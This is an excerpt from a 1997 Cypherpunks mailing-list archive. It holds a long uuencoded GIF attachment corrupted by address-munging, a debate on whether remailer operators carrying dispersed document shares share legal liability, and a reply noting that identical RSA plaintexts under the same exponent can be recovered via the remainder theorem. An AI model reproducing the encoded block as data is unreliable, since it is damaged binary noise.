consisting of a Prelude that somehow defines the hash function and of
some other movements that give test data for the hash function, for
the derived encryption function, for the RSA (or DH/DSA) key generator
etc.

Bodo Moeller



The first four bars of pi:

begin 644 pi.gif
M1TE&.#=A(`-8`H```````/___RP`````LP((`@`"7XR/J]>?.69KNT;AX$X[_T?&-KM at D7C$9E,#7E*
MYQ.J8A*C5>L5>VENJ%GO%WP8&KIA\QF=*V/6:?=;W1S#Z74[A[BMM.]]OXAJ
M[F^04(F/(E!OXK"PL8,)!Y)M2G&RTC'B$O-N*B-/\X%R<]2SLX$1A!*5011/
MCF;L9E9&QN/3)Q+>AI=#"6Q>]NE^MJ:VCQ!WA,-4*
M3D5`5/4ZK#:YL6P-H[V-9Z],.<'R.I/I-;9X#$E5Q#8^K]\CYVIV@!'@3YD?
M%AR.H=L@&D4:S..68N#9X1V?#:/.P6-DY4DD%>8H::DIIU:4V)OF))2KQ^?2
MJN8?+&6;;`[B'^X7:FW<7FAG\:U%\*GR,O-H*N#E!UKR\+$9KR4RGBY9-*6U
M[],U."1Q_LVM[@5/*%H^QIU+/9O8Q[Y5^L\;>6^]:-F#5TH=PH7
M,E2B#]BT,8K\\>@3<.!%:933"N+[]RHA`I!6"+X+!LZ8R%T/&[)LZ40BP%H2
MQV6T1RN?S)1V'![LB"I3S40Y39)$IA/4/8HNES)-!$78HJ1-O_D+>C2;Q9Y;
MNEW-]W&BMU-)QTXM:[84.I5C-_A4%K;$E1Y*Y;3]*(=.78U=5AD-.S?KVL!G
M!Q-NUI6JX,.DZ at Z2FHOGR;:*?[Y\ZR*0N\":C^1=_D8@/J8NMS^,F5I?(P8NIJFO/+FNOP[SROW\_M]]8?G^`@D=P;
MX8.?HA='((4C8J3D)*#9!N3C8@<$B*:G&Z44)J?,IMXGJBEIBF&HZRN;W]5,
M:JTM(^SDSMJMYDBKTFCN,/&0G8UP<.]R:K$D4QES'6NR0[4S(31VW'30=:6T
M-,T2SNYN?(SE%NU[2'X5/P;]_R5%WO8A(%@0H*M.ZQ1B
M.W8#B4$.4=Y]BXC0&9=[(DHDS/N%Y"*E&@LUM./3S1V^CU`HQ@#ITAHH?1S!
M42%AT5S^+ at +Q,76Y_1T`1T(S0[6;]R;!,/0TCRG-!$M-E%LWEYWIVKYQ2S[A
MZ!*!P%IO1LP=D4E04E&I^OE'QF%S.JL(_[CJM&S[9
M\2E\4H>6\3946RW,>^.L(,Y(^-RDUKP*_Q@;'1=UB.0"#17L)C$S-3$?.R-@
MOA(](T4/?7((7[9*QRI'7V%O#"LV:VVIL%QC=U7TG7[C04,/V;I>9
M_2[!A$V?Z)JKK:^QLQ7U1G6C$7TC+Q;L,J"9/K/5US7):7#[-+H0,.;IV?'S
M1[R_WZ\I=/$[QLV3P'YZ5H":%DR?G'BU?@SB,TN:/T;\`AJ;E'60(Z!;'T@@
MW%BP8R-YML(!5-FF7@=6Y$*-&(0LE<2+VU2]Z2BS$\\_FV*$)*BS9\E<]N``
M=,A#C:5'/E,.O.='$$*H./-@%/INY]6?7LD$4CES:Y$EW8QZ)#;'QTE>,9E2
MN_-)%KRTX[2X'*+1#-B^?L6XXMOJ+,F[=/V5(\4F+]
MI&K2;M9B%3V/+%K^@T!\3%UN`^CD at 2!86?7F$T7/P9:1XKIO`D,&9=LW;LJ0
M5NUWE7<2OS1>\`,4\GR]HJ*2O#";3B-46M,]8TO1Z10]YF8/[0:6Z7I?N.CS+>\P#RC*JL3>5M=E4]ID4>B46."U1IV1",Q6)^9N:<]1S>T;Y5]@]'2K=#QAEKZ%2M4P61G/?^!TB%*C/*H at E&4*1=^_9FH?&U&F$B.X*"FPB,:*L
M):FBME^]KG)I5:=[LEC'66WKV*'Y[FZDOE5V)M.CC]L\IHL))U;)E_)>D8[^7H-$%
M17EMU[R7D6W%"YF,17(SY$8L93DM)\6+[S9VS!ER7-=]0U/IO$?OY$NCX7J^
M(QHLLT43::--?4SSW]C(/?%V-7LXYLRL3P*W>TK^'H'XF+J,\*"])B>]!VJ-
M<^S,IX at +*74FJ*XCZ[YPDKI6;)\P%]=W/^.77P\C).J&.:22!0[1W%)S>GEE162'
M>TF)>4U?8XLK at U^2+W:6EYB9FIN)US(%[*<1 at 4QFA3'85XZJWE;;YO=)0K.#9_]KXFMXBE_29D_-5/OH\N4HH='B>'CH
MSF=$C`%_QK3F%-XNL4NU)H2&UH>^M(G:AHUJ!%F:*66Q_BIT\^A&NF(6Y86X
M\VQ!AG#5(J6+"*I*P-@@4WMB<"@H=H(^LO2K%)>\P8\E;QV+;NN+)+Q598MVIJWH[5L3;RMJGLPC'^",3'
MU&6#!\W)\ZJE&6'MXNR63PP9+H&@+-O4 at 9/4Y?"[(;>V%=9:QP8]M[E-NJ+)3$%/14WU+_>02+:G<#,AMF(W%T50TY2T"+(Z0M!!N\SU*M1I$=0V69 at I*
MN_JQ9<[;'O9]UIX3O]7:I>16,59?9V]W=]?-,=U-3GQ?[ZY]YO*PH]93I^57
M-`XGBL7K]6#%!IH#U,>[/+!
M:4 at G_T`"/%:/IT:D06%MI>(38Y6I)4D:*MNLJYFU3&']JCJE&:"A8\%$M>JA
M[=N]KX2RC3BN2BRN4"+]%=@W\-J\&SQB:SJP**=0>?&"4VPXLZRRB(]J%DPD
M;:/&W%9YWLQH=)S2D$R[E3GSV)V_!\6 at SK>:V>1&IT(K3>R)+EF at J7MU]_^BLI8SO!Q!G".\HC<;GS_'HL68N+(]0!L+2+Y%N43'R,S)0,&ZS2*2T
M22 at 3K)%Q$E02!$3%#';K=4'NM?5OE;33TU8RUU?X at W?T!K$VJ#C+F1@*^/`6
M2?;Z.I43VX+,N!):&QQ.]+LZ',W\?`97_0`YF;+94$P5U7'ZTHJ;/]O]28\\
M<_DD*)'USQ2K>\=F(>+5S at TF0.@F]N/&@=F/A8P5^[6Y9)$@PCL7_X6DM0Y>
M'Y`KR[U at 21(@23LO:=:LJ<,FGYP[4T[A>3%$"9HBB9Y":!)=MV<6W['X":.G
MO:<2647YZ5$@(WHNIV((1]$AQ*)CFY84:X5C08`%;71\1)6LH*AQ at V7MLM4H
M,7%)CIJD^U<84FE=E0[T.X[L7,#VXA#9A&JCWKY@%QN+;/Z`0'Q,708'=MZD
MJ$:<]>:=_P$`L
MP04CC#N+/4(9MR;#1\RQ[TE:Y"]C/8+9/
M!;54L';0X4-SS$`U-$50#T2,OB<2ZK-33%U&D"&9_`.ER2(MD2D)T:.B,!U'
ME3%EIB"YX]1)E#-USF'+22`^INZ"`SLPAD"QB?X""AD%_8W6'A(J-17=8:7>,D9:7/
M8Q]'(J9EIZ<(9U1DPV>I*9\B`N=FZ*GKJT+KTVA"*NPM+I%M9NQF[B^PJAEM
M;;#QLH`D%\3%T$
M!];BI-5>G/7FW7\P%#V'>IXQ55>V=5^8 at V*YK&8ZUW>^]V-;)/@C%HU'I`:7
M-*`L2V94.J4:AU5L5KM53IU/;E@\)@>@971:#8R>,N=U7#X'P>EW?-Z<=+_M
M>L#`M3_!0D,J0IZ^BZM#QT=$2,G)HD2?+Q-+RDW.%:*JN;.L&Y=LYTE++>*[O?'_&OJ!PV*,!B:$C$F&$*)?0J'0Z?%*O
MV*C1FIUPD4W&MTLNF\OCLWJ=#+-M6'?C3:_;<>F[_K[-FV]2<@E^>X6&AS"(
MBG9;AH!:-$Z+DSN/E""$EX&978)\G)618IJD*IZE&Y:H5*=LK72J8*)PJ[4?
MC;:IH+DZN+QDL42ON[^K?<48P<@\QYA]S]#1TM/-#\15<;-SRR,ETC#>,=/DWQ]O?4B4RO%/X$\3%U%1Q8@)%6>W'6[\(
MR=(\T505I6V,(#%>S\3Q0".V;GPF?3_:D%A$!3M&F5#'DTJJ)>;1W&
M!-N=RI#"HY=,#C6/RE6K]6N6,SWXG%['Y.QY_7[+=SD;_!;4",$$#^,`$1>A
MY!@?(;,<(ZLHZ;@L$11',"^-V+0R12LF84I'1T]1-T)7MSI=+V!CGV8M-]^^
M/FEY65M[@3F#$U6'C0>/66-Q==``/VV%J:*3R\ZJ>8NK\;"[7[Q)EW\UDX8T
M9K7OJ,%UF=DCTXVOW[?I^UR9X\FY3>5N]$FML_>'WT!X`H<5-`@,8;>&B-PU
MK$'!R41?"[',PTOX".%#2`JS&?1X#"#$<\N0XR1TQ@$IURHIV=%7.90L[%M)J[@S^5`+Q
M,745'!ADYLGV8JW!39\ZSOK(TIRT$3N]M1S96)[I&D;26M_Y_DR!F^!0-`06
MA9*0"F(,^J"?4!2Z64PO*UB20M$@G6$G6)RCXKX'UVXM/;_AOV8Y_:;?\?DR
M>1^O\G-N_`9Q"'6L&J2PLD1`Q#A>])*T).?:4`([IA#]!%N8B)Z0`$,OT2HU
MK5!7A0Q=:3Q?[61I:V,X"UM(VLR*&ME$X5)9CY1(*X_W3%^1J1:]EFVE#6.G
M>:JM>["MZQR!>[/`9\2SKW"=9;;+UQ/#G]GAM>-]U.=_[-7.O6"[,8-MZD5Y
MIVC at GUOX$.9BE+`=0Q0.QT&TD;!?/DD6=W%]H1=06[1R'+M(G`>2HL@()E'&
M*?AQ&#W_"1%C3I;<,2XH*I5:39;J at TY*.
M#!IUZ%-=%%M>\Y3&XSBJ+"K"NWG%JBU!7VNAA5H6!%NR6`=2;;GFV5A,Z>PZ
MRJN0D$NU;DVCSOKNHJ&5F.RYGDS?RNO<.7IAC>WH86Z(=Q%<;Q)?4VV*7X]VA6,7,S
M!BE4B`8I!RTG+?I+S?MBW:"MW!P7X5R=RMU'#88-#3IKGD'.
M3O6>XQZ_1F\X.]]-?'F9CXC>QA^*>0)?`8REKF`Z>RH4,NST4%[$;/C8X,$U
M;%V"MH&8P.`:UW#B/8>$#(F\<+(#288K([8T5G'2/WE\>LD*607DP)057N;<
MQA->4*%#;1:]D?*@1J#`Z.SPV>ZC+YQ!H?XDRM/JU*/UN'H\J=1:1T)VR$E8
M*O$J(Z^46$;PJE4/0X\D=#PP*A\2B
M\8@\YFC`A6MBT^VB%\ESJ\OVAKN[F:"V&"HKBUJD*_H(/!F\S(R1_`GK^YS6
M1F)%&BT,2G'*F_>*;%H#N4P.PQKNK3ZX[L;9K`TO/V]>3BNMI?2VSS4]'5/I
MSK]#3`8Z,^CEUSQG"VLT?,@,H_0&.3X`V0K>7Y$1C()
M,:7*?"JSQ7(DKA]%,2C%L*AIDTO!>K-(=L')9Z70H<%XAG)I#4[&!5CDA,L at 2LV65K60K-NY0KYZHTO5Y
M$JI`M%/!SH#[Y:=6P'(+/[R[_H!`?$Q=!@?EV*35WB3QYMU`+PPTL1P?T%Q2
MM?U8!';G2:9O/-=W?K-[T2/R`Q:-(>(,13J^A+ID\\",25U1JW6YY7:]7^Z1
M!1&B3MO7AZ)99I%4JEONQ@:[R-83VHQG;/TY"\"KP,HFR1#!&L[;`PK/&
MR;`JRPNR,\E'2`Z]DTX^E;JU'+#0O1+*5=96UR^G5];-R\4*4M1
MW(8&6>)BXV/D4S2Q8+S>,K7!WVGJ:NO"3*GD[>--1\ZK9080)%0H\1(D6P$`#)1:I1%#5
M.8,4.C,NY-C1X[LV(3^.X"=PQRE[%RFVTS?2Y4N8,1%.-#EJEC:,US;*Y-G3
MYT\:-*%P:[FB9KR=0)4N9;JZ at 4!\3%UN?QCEG(`N>S'@W7\P#+4D(P/SE#BU
M=5\XEF>ZMF\\UW<^3LE?1#0D%H.J8X7'ZC6=3VA4.J56K=.DDF'D=IFWK'!Y
M)9?-9W1:O8Z&(5[XAZW5N>=W?%Z_Y_<;=H0X0<"V%D*70S_%1<9&QT>ZC4$C
MOB^-1,A,S4W.3L^#H$DB1\L+S$_45-555B>3R=52BM/66MM;W-Q`KUR1%5K=
M8.%AXKVB8EX%V6+F9N=GLQ%G6!1 at Z&ML=UR"^)BZW/XPRCF!I3CK3:W_8/AQ
M9&F>:*JN;.N^<"S/=&W?&'#H8G_AP*!P2"P:C\BD$RF/LOHM'K-;KO?\+A\3J_;[_B\?L_O^_^`@8*#A(6&AXB)BHN,
MC8Z/D)&2DY1P8`3Q,76Y_6&4DU9[<=:;=__!4!S)TCS15%W9UGWA6)[IVK[Q
M7-_YWO^!0>&06#0>D4GEDMET/J%1Z91:M5ZQ6>V6V_5^P6'QF%PVG]%I]9K=
M=K_AM]N*L-^_^@Z$XDJ5YHJFZLJW[
MPK$\T[5]X[F^\[W_`X/"(;%H/"*3RB6SZ7Q"H](IM6J]8K/:+;?K_8+#XC&Y
M;#ZCT^HUN^U^P^/R.;UNO^/S^CV_[S>6$\3'U.7VAU%.6NW%66_>_0=#<21+
M\T13=65;]X5C>:8SX,9K?>=[_P<&A4/B"'L5FM5MN
MU]N@(C6`;]E\1J?5WJ/5EKN0UW-ZW7[')]J=O1OBSPL4'"0LY!'C(]N3"),S
M?(2,E)R<0.1H!'Q8I.3L]/RDV[RT9(0#/45-Y7(L)-UP_5.4RU0]_B"(CZG+
M[0^CG+3:B[/>O/NO`2(@C>#IF=](6BR+QO),U_:-Y_K.HV+W>BV$%%7O>(!A
M at BVD\PF-2E/-J?6Z46:9U23)".%B:=H+>(Q.J]?4'_NM_KFWWJXW<':(X1SB
MTLX7*#@X-3=A2)BX`DC'$'2(N,68=^1GQJB8J;DI>_J')ZMG6K**@QJ">U?$"]F*YRLX;(N*I1F,Z?6MZ:NXT\=N]8+:A]O[
M\RXH'!*+QB,R&$LZ>AV at 4-=:PC0V*3-'[6!PDFW%FQ#OK*H?VI==L]ON-YQ!
MCI^Q7S/1_ASJI_0_(`_>&-255AIB8>`B8Z/CE2)=W\,D2^5=U&67YF/GD5I9
M1.+HH*?I*2J<&5BJ8!*K:"E))`6M9%IKKHH)*:+N+W`P#6PK,:]L[-RQ<7`O
MVJZP&W*MH#-G-';V(K,VY#(W1G>3=:^<>(OA(>DY>_O;M7NM\G`\$_E]R70]
M at O[7)NZ^@`*K#"PSKV"J?/A^\`L7K9\1@`@G4JP&KB*_BR6Z&`*"2&DAR'+;
M#&K<@/$D0E`H48K\X]%AQI`R?;%Y.4XBI95M_ at C$Q]3E]H=13 at BLI5E?K/T'
MPXDC2U-$@52M3/>%8[E$$3:<2>:N>_\'!H5#8HHQEP
M9K&]JB?+272A8W+9?$8'M6GD%6;[TK#5)QLWQ[P_];;S)\Y at B>L`M#,\1,1+
M7)P:M!N$C*,HA*+LFP&Q'(%+XI)2D&04':T$(STUN/DJBFP-S7RL6?/R=*#R
MT:RXE"/+1?WE4 at 4F%00%33SI?UYMT'ZL,^+201\UQ2]6!;[R5EAGYL[M)W6.KQ7K!BN`B-1V2R
MDAJY=$IH=#@#YC#-C<5%C'1WQ:NMVADWOF=TN)B3;G^0[K%L;BM#ZWI>#\6"
M)-J^/4&1K#1#,"VNPS.0149'R$C)Q9,7KTG,D<2EH*JQ/D:5N$S24E/(QKG!
MU4(?%$#5EM-96AXN%+=0.*'8$CD*IKK>M]3,XEI2OZMC9$,Z0:;AE4M)/]9K
M5S?.IN9':Z+CXNRHX%()ZV"5T9P=:07OO%/XY*(IAO2\QE>Y4NZC/H$->'6M83.BIWXU.60JF
MA%%1Y2N7,T120481STQL'Y/$Q(FKDBPYZS:18;ENI<2?\EB&%(5JN9-!6A(MD(,VSKMD;UF4?P'G88P7_ at F!^)BZ
M`:".21C-DZ[.S?NY7B at BX*B-6XDFZOIE[M2&LW?&)`:[M=GUMAL/QR+ZC$A(
M8&/I*J=J0Z'69S*-SLTV\4:[7
MUOA-;F]]*2ACAV$-B(N*+XN/7HJ0&EMQDW:$A7=+/8*9DF(-1768)J4LEZFJ
M,&8@@(":GZ1E1*<W"19VKB?X=9TWC.RM>A[NFXWV/2/1/$
MS@*F"911QQZG=_\6LB.',%$[-3_6I,&39XN&P()]0(;T%+$+(ADB:RVL
M9 at C?PSTEP'3CV7YI&1;U9Z_ at 6ED=[:[5
M1?;J3Z0.T<;-M at XCQ+L9R[(QM\(TC_4=
MUMFSVLP<'95>_D(@/J8>-"QZ<#)'E\OZ\AX]	?R)2@=&(JVP;I.:JPN[D7
MW>;*?OM_[[>J:2RWH%!GG"`Y2]%#ED0UIPF;SFK27SVPG=&]>F?3Q&;V)W<(6*BXJ+<7N,+&*,D(J31Y.4A9!^?
M5>"5IYT=:,GHFP0G:>@,:H72V:,J3ZQAV0YFZ9X0W&1G'*6I9NK*+?'L%IIQ
M+P_NYNJM8^9QLA,K,%WU)U:R!?%@MV(E4Q=S\#2*4I;Y]SI[N_L[?+SVIUB4
M#+ at Y15GA]9]?C+QR;@8=&9=/';J#"F/T6:B%'"$O$!UF^[)OF;QU>4"FS5ME
MD*(J3]A`.O/2D.3&61!'ID%I:N2IC.`R<.1(4]!'ESH%"MMY,R6RG4+O`)J(
M\J<^(C7RL2S:="A4E4M](BW8,JK0IV1T487I"FL>L/S$DNVI1R=!H$G+'BW*
M%>U%6?VJ0M7*]BY>4$9UT4T8%.^0D&Z![`W^0"`^IAHTK'HP2>1:<'/S[A?V
MB2-I526:JBO+GN7;RHPV9S%HZ^JU0P\N%9(%?;`:IVBB7)I*H_`)=?5F&B$I^6QY_)GM\-
M(6.C(YL9H"1%B]0CX61$%HW0#V3F#RC>9X3AV`G;I6J>Q.J5HFB<:ZP;:90K
M;BZK+F]OG\NBK_`P<;$@`^W!L&=6;:'82G&TR]S?@,M1X
M9LAO.&*S']]B,&/Z&I`QF1.Y]^CZ-WYDO+_%OS#E?`Q,IR]608"J:*`Z&/"A
MK&TC[.E)F.P8#XAQ_B1JG,BQXD=Q$"TB6\*.605^'1]BK$5R0TN#+Z.MO%B3
M8+>5(:7Q>]+LCL.;+*?$%%$TW%$2.X5>8^JTYM(O24LJ8V;R*=8=4P>I!+6U
M7U:185=$'5MJ)#Z?0:H$->M665NX&F?2--/U+=5!>#GM)3O^A4!\3$5H6`:/
M6S18F?7F!GRK!PT55>V==FK,1,93&<\+Q\-U7-?*_8BUGY'I">9]&5X
MDB:C9ES^HE5LJ#@L=F6?[,[[(#N?&U78,V9[(V8PG-*FGR^Q.XT*K??][@DU
MG*L*M+0A/,$1%\6>.42>OSVEQDHF+LE,3$!+J4RBM\Z..-'233O3DTF:T1>K
M3PQ8MS\%U-1;7+Y6PES
M&>YHZU[O-5GPVVQM]'1+X5IV]:SS=RU2$?%O;?N\N:>M]'AY@`&'":Q$CZ".
M?QP23BOGRR`E$@^-23Q8T2*KB_!!*&9<]`L"C(`-S4D4^;$D1Y0IH9U4J1!D
MRVUU*KIS2).E'I at Y=4[<&=%5SVZ@,M[LE(_H.*!)E0JBN;3=1J=1"V&Z(1`?
M4Q$:ED%YVK079[UY]Q\,Q9&4JA)-0>=1W1>.9:6=5\>J\^2T_1\8%`XS/>*Q
MJ$,NF=E5&*_3DUF:V7G:
M.K$ZL(,@/J8>-&QZ<-)J+\YZ\^X_&(KCU9`GFJHKV[JM]'I.+-LWGNL[']4]
M,"@<$CNFHH*&7#*;SB<#*IU2JY!C4UFRY^\K'I-16*8C$RZSVV[.^BV?
ML\_(M)JNW\_C_#_ at DMV$7XI67F"B(E3AHN,CR^""I-FA1B-DIJ;A9J>G"*6/
M#`UFTN+SE5,S&
MO!S%+>?W_:*]/\%!PC"[&S.\1`C"1L?'A$#(2C7>+A9.5E9N9<2U:&
MYFGJ:FO(9_P3 at OB8BM"P#,I)J[TXZ\V[_V`H6L]HGFBJKFR[-F[HE!`BX?'XKT^]X at _JQ-MN=;S5Y at X2%<(:(?H$,;5F-@$J')(N)2'M\`6LPEYR<
MF9&51J&C5:!)?UR.E`>=K:ZOL)G9D)93\V?+9[I*P9C\/',L:,
MJ$_,1:O+2LZO'\&PN-#8K=J1F,ADUEW..X_CVM_HR>:X8>M`?8(:LBW2V>WN
MQ^'Z^]>\\.D`Y>%3!D at 507>N`G(PI1"/+UL-(R;9P)`*O at W^!.)CZD'W,J@<
MK4_BK#?O'E:?.)*E>:()H%F!];:I/-.UW5U??L\K+X'EW6I=IIJIPI
M3L#NK<".GC39YK+JXO'ZUH04<@E?V;:6UC)(#CTD_R*O/DOW3%=;C](2%V*#
MZC at K?[Y'@:IR/8SP2**R8//Z2$RI,M`I+5Z`
MK7P$,>0N(>LP:G0BS at K-C\8JBO3FMC"VP3;-DHC==KG*P)ZX=O%K$J[S&E<81:;,4N
MG^#R$[!H:G(I]N:VMM=P+;BBL-!X\'4W=;5JZG2Q0((22\A**-$BPVJ5X2(NX?AC(\A$$W/%
M`J6GY"J']CI!-$@.XS>8(U/0G%FSFTN6(4?=^]@%6\Y3[$P&\B.S'])>1WFH
M?+?4)C((3[5-/1*4HLL\(J\ZO5A5DD.NPXI"_924*IR=/80V9;FO+`ZXS2K^
M<1%3K=U\8@<-A0(0$\2"&Z,"RN*ML-201ISJP at O)6MNSN.02IHRU*Y1Q4[_.
MXCS^@4!\3#UH6&;F%IX_'[+8RHO!$\T55=2FS)8>F.:BS>VK>LNZW=@
M4`CY#8U'Y)'BVA"3MF=T6)16F50$=H&2Y4ZEA]9J%"O*MW'6 at 5Q*SU.OA(=.
MU^?V:A._G0G?]#V[O\"=/CZV01\=0JO$1,81/3+)IT>>-A@&A:&)8T2*P&TN<)*)+F,\'OWX.CP'D
M.+`CR9,TSA at D^*9BJ(W2IC6J!"<9BXDF4Y8*&!/62)^V&#WBQ7+GQZ.EYB4M
M=%3>PZ"Z7'EZF84IM9Y$C5*\ZD3HIV]7MVX]B+3KG9U13\U$"R,;6;=:*3X]
MR79?(:,A\E`M"?8?T[&!-L(E1EBLSJ52A^8]JT9?4+6]%MTC)+>C-<$T!:]L
MW+9SM$%OJ3)F_D0@/J8F-&QH<-)Z'(ZVXNX_Z'`;\I#,>9I0V+JO)*;4.JOU
M at ML[/_8_,,B:Z(:_HE`A22*33D,G!YM2JU3-!=B*6#_<+OB:B>6>WY>MR51C
MS6X+^RT7-N/MGIV>W^SGJ8Q27]0 at SQ*=7Q9?(I2*6Y_2G"%#%:.?9!EBYITF
M)XJBD<^1ILQA9Q#@I"F1:NE?H:,HZ\S85-JC;"ON*$G=9RSBI99N83#7L-SM
MSFWR9F[:<2-O6)]E\QLS at F\+/R=O=;^7ED:.#T//U#
M_?R9^B22_=D2.*APW\RXTV7-F+E3!7FE:^C$W<)5">.]F^BI1+"(@4?N38/2
MCZ,7'1I5C21)"J!%;I8:ZH@$%*@/I
MX:;'LN.PRG/*2NS8:`[=HEG[]>&NG7(]'GR:ENPPO'.I^?\A$!]3EPT>1CEI
MM2_`MC?@OYG`0_.N*AM'+SPMM8,Y5J[IL,YU1MS]^;>XX7B at H>X85,Z22Z=/
M0OJY+AGJU835:E.J)A3VLT2UE
M"\W3C_#P;313Y`4W#8.D\'%TMLYTJO at 8&8F7DT).%6&L-YFHB#9V-PKZ>IN;
MJZ'G4&4T5ZV`HBPXMFIC0ZD^AF",4JQC:6W-21F361*-2@=.C2
M9$R+,V4T._&*&AZ1'F7VI'EF);E2,/<1]7FT9D!PXW`*,0JC(E*I4%L&?4JG
M8_R00'U.7VQ]&"<%L
M`&>M;?<_V+!0W,@,=*HT6=D7CN69#NL2']4==EN_%A0.B<4/D)+C&)D_Y1.Z
M7(@.R)2UF=5N.]AK#N'UMF)6%!>=5G/'4>J:Z);/W;(Q')^WWSUOA?A!B at 5(
M4,_P$'&*D$XG\881,O))@L_1\K+1+@)0T:3'Q?-2='1K!9(4L4)5DG72!A76
M,K-L\\*II`PG=I=W)JH7^*2PJA6W,ACY\89,59CU]04W>9KZ3[<:6Z5XY#C;
MF[(;?/O:(/QB^#L=%5V]G8'1/=YB]G/<,W207GZ?O[]WU8\_@=!\V0L3,)JY
M at 0L9-FRBSV$[B%\XH%B51(FOB!(;.79DHM#CKHD at 1A*\Y4I3R`2*!.)CZG+[
MPR at GK?;BK#=WH(.A.)(1\(EG<+*M^\)N.=.U?>.YOO.]_P.##54H9CR^A,HE
ML^E\0J/2Z10E06*S+2JWZ_V"P^(Q>8F9J;G)V>GZ"AHJ.DI::GJ)JGQ#$
MQ]3E]H=13EKMQ5EOWOT'0W$D2_-$4W5E6_>%8WFF:_O&_\'!H5#8M%X
M1":5RQ#`"6!&I5-JU7K%!I[;DS/[!8?%8[)O"]5VT12TM_R&Q^7S:[O-KCP3
M;H:;3P<,%!PDA#F;6$/4.^#S6O-++)2KR['"4M-14[
MY+0X2^UC/(6-E9T-M]RN
M]PL.B\?D'\MYGCJS#VW2EFRRU^6ZO6K/Z_?\/C<&53-EI88GUW*%`[<(P^3W
M:*0%.4E9:7GY5"4X1T78(-FX]'3HR89Y.B*)NLK:ZCH$F(E&E^"6R&C(I/K*
MVV;X$M4K/$P,&0BCYKM`=?P;5PQ=^UNQ.<@W/88=O9OZ=
MOH.NWK[*#O%\TP??50^-S)H/>^_N;ZPM`B!:=>!<"UA,RCY4"X7T^P?^C4!\
M3%UN?P<`A-):FO5>\WBN`T--(AGS5-^3[N7R\K&
MLQ32*[$KQ0?6PS]+4DW9Q1U85-Y>5<1(33U1VL["/&&W8I[=6%Q37YU3T]-F
M(&)/#]MIMIF77,M4*D6:Y^]H]/3NC+C5$F*_5M;DV9I50&P1]5`;>F?S=]9"
M50.Q+8<+0=2<+'P$"Z&T&/GV332#J]V7+<;+E&Q2\`R@&X$1WE$$N4)B+3IP
M"'HLV(:CM%HMSZT;B4DCL"@A2>Z4 at O.@OP_A-KZ,:9"9SEPXN4D"VO/C,*2'
ME)ZTR:PHM#H`$2XD&LX)-)YA\4Q=6O3(O6ON`KHL*W0
MUFYKJU$OIDUCFFZ]"K-C7[&)Z\&U.XHJ%;"M[$7M,"SQ/;J4:<5U9N=Q(K8_
M*RN\>%@46I2FRZQ&K-CUHD"_(!UM?+!?;8BM?U'SW/7S[=Y/?>L6?-9X/[R`
MV;`^_/KM!('XF+K<_ at T`2*NE\B[)I_Y']DT>"'7BE2*U"F=4I567)714L167,,C2/:T]C@&F(C9NW^#AXN/DY>;GZ.GJZ^SM[N_P\?+S]/7V]_CY
M9M$Z=Y)S%IB96F6%D]>???`@X1)!,S1-!I
M!966@=U'9N>HOO6=[_T?&!0.,;++IB49WU!@QH+1BN5WO%QP6
M;VK,9E;5/!O4ZQ'TU&:?UTZT&47/J]/\K'[.;L0O<&_%S*$.T>WORZ-=2[53C`UC=;V%@TV5[85U]55
MZ[>N$V+XY6WV-'?Y^@H$O7YL4U9NG'3&S7<]KS- at 2I4K68:1R.VB*G^]U#VS27*?.'L63TYC
MHO,GRDL[2U[YF+";R%WIQC%\17%+2ZE3J59=HG'0G7^1R-UKU_2KI4%^)"EB
MY-5KI4>%)D[2-=0FH+);$^GYIQ4ON#UJ`98\A!9 at 5*N#"1V?!ES9LVD+ at C$Q]3E]H=13EKMQ5EOWOT'0W$D2_-$4W5E6_>%
38WFF:_O&_\'!H7#7@$`.]3E
`
end






From kent at songbird.com  Tue Aug 12 12:28:34 1997
From: kent at songbird.com (Kent Crispin)
Date: Wed, 13 Aug 1997 03:28:34 +0800
Subject: Eternity Uncensorable?
In-Reply-To: 
Message-ID: <19970812121230.24614@bywater.songbird.com>



On Tue, Aug 12, 1997 at 12:46:02PM -0600, John Kelsey wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>[ To: cypherpunks at algebra.com, Wei Dai ## Date: 08/08/97 10:37 pm ##
>  Subject: Re: Eternity Uncensorable? ]
>
>>Subject: Re: Eternity Uncensorable?
>>To: Cypherpunks Lite 
>>From: Wei Dai 
>>Date: Wed, 06 Aug 1997 11:33:55 -0700 (PDT)
>
>>I suggest using information dispersal to spread risk amongst
>>remailer operators.  Use Rabin's information dispersal technique
>>to divide up a document into n shares such that k of them can
>>reconstruct the original, and post each share via a seperate
>>remailer.  It would be hard for the government to single out an
>>operator to go after since an individual share by itself is
>>useless.
>
>I'm a little concerned with the usefulness of this idea in a
>legal sense.  Imagine the physical analogue:  Alice buys the
>guns and masks, and leaves them in a pre-arranged place.  Bob
>anonymously buys a car and leaves it, with the keys inside, in
>another pre-arranged place.  Carol and Dave collect the guns,
>masks, and the car, and use them to rob a bank or hijack an
>airplane.  Do you suppose the feds will have any problem
>prosecuting Alice and Bob for their part in the conspiracy?

Yes, I think there might be problems for the feds in this case.  Your 
analogy is not at all accurate, since the remailers have no knowledge 
of what their individual shares contain, and didn't supply any of the 
input data to begin with.  Here's a different analogy:

Alice and Bob and Carol and Dave run mailbox outlets.  Elmer and Fred
jointly rent several mailboxes.  Elmer mails a single piece of a gun
to each mailbox in a sealed package -- ABCD can have no way of
knowing what is in each package.  Fred goes to each mailbox and gets
the package inside, takes them all home, and assemble a weapon used 
to commit a crime.  It is hard to see how ABCD could be included in 
any conspiracy, because they were providing a general, legal service, 
and they had absolutely no knowledge of the conspiracy.

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From ghio at temp0107.myriad.ml.org  Tue Aug 12 12:56:10 1997
From: ghio at temp0107.myriad.ml.org (Matthew Ghio)
Date: Wed, 13 Aug 1997 03:56:10 +0800
Subject: Encrypting same data with many keys...
In-Reply-To: 
Message-ID: <199708121945.MAA16770@myriad.alias.net>



Ray Arachelian  asked:
> 
> What are the dangers of taking a small block of data - say upto 1K in
> size, then producing many files, each being the same data encrypted by
> other keys?
...
> Assume we're using 128 bit Blowfish/Idea or better, and discarding
> weak keys.

For a standard block cipher there should be no problem.  For a stream
cipher, you would have the same type of problems as for OTP reuse, but
it would still be secure as long as you never reused a key.  However...

> What if instead of using a private key cypher, we used a public key
> cypher?  Would that make any difference in attack methods?

Yes.

Having identical plaintexts raised to the same power modulo different
numbers makes the solution much easier.  If you have enough RSA
encryptions of the same number to the same power, you can solve it
outright by the remainder theorem.






From sunder at brainlink.com  Tue Aug 12 13:12:44 1997
